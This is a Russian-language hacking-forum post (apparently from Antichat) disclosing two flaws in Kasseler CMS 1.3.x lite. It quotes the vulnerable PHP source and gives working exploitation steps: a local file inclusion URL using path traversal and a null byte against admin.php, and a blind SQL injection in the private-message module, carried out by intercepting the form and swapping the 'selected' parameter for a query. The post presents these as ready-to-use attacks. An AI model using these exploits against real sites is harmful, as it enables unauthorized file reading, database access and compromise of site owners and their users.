Форум АНТИЧАТ - Показать сообщение отдельно - Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection

name: kasseler cms 1.3.x lite
download: http://www.kasseler-cms.net/files/more/kasseler_cms_1.3.x_lite.html

1) LFI (требования: mq=off)

file: admin.php

PHP код:


		
			
    if (isset($_GET['adm'])){

        ob_start();

        if (file_exists("".$admindirect."/modules/".$_GET['adm'].".php")){

        include("".$admindirect."/modules/".$_GET['adm'].".php");

        $amodule = ob_get_contents(); ob_end_clean();

        } else 

        if (file_exists("modules/".$_GET['adm']."/Admin/index.php")){

                if (file_exists("modules/".$_GET['adm']."/language/language.".$language.".php"))include("modules/".$_GET['adm']."/language/language.".$language.".php");            

                include("modules/".$_GET['adm']."/Admin/index.php");

                $amodule = ob_get_contents(); ob_end_clean();

            } else {

                open_table();

                echo "<center>"._ERRORLOADMODULE."</center>";

                close_table();

                $amodule = ob_get_contents(); ob_end_clean();

            }

            $template->set_tpl('$edit_content', "<div id=\"modules_conteiner\">".$amodule."</div>");

    }

result:

Код:

/admin.php?do=LogIn&adm=../[file]%00

2) blind sql injection (требования: mq=off,любой акк)
file: /modules/account/pm.php

PHP код:


		
			
    //Проверяем выделенные объекты

    if(isset($_POST['selected']) AND is_array($_POST['selected'])) 

    //Перебираем массив выделенных сообщений

    foreach($_POST['selected'] as $value){

        //Выполняем запрос для получения данных о сообщении

        $result = $main->db->sql_query("SELECT p.mid, p.tid, p.subj, p.user, p.user_from, p.date, p.pm_read, p.status, p.type, t.tid, t.text, u.uid, u.user_id, u.user_name, fr.uid AS from_uid, fr.user_id AS from_user_id, fr.user_name FROM ".PM." AS p LEFT JOIN ".PM_TEXT." AS t ON(p.tid=t.tid) LEFT JOIN ".USERS." AS u ON(u.user_name=p.user) LEFT JOIN ".USERS." AS fr ON(p.user_from=fr.user_name) WHERE p.mid='{$value}' OR p.mid='{$value}+1' OR p.mid='{$value}-1' AND (p.user='{$main->user['user_name']}' OR p.user_from='{$main->user['user_name']}')");

result:
Регаем акк. Отправляем сами себе ПМ. Заходим в /index.php?module=Forum&do=Outbox
. (для дальнейшей работы потребуется temper date) Выделяем свое сообщение,включаем перехват и жмякаем Отправить. Далее изменяем значение переменной selected на свой sql запрос. Если запрос выполнится,то сообщение перенесётся в Сохраненные.
Геморно,конечно,но работает..

//много файлов,не все еще посмотрел..
//скули с поста доктора прикрыли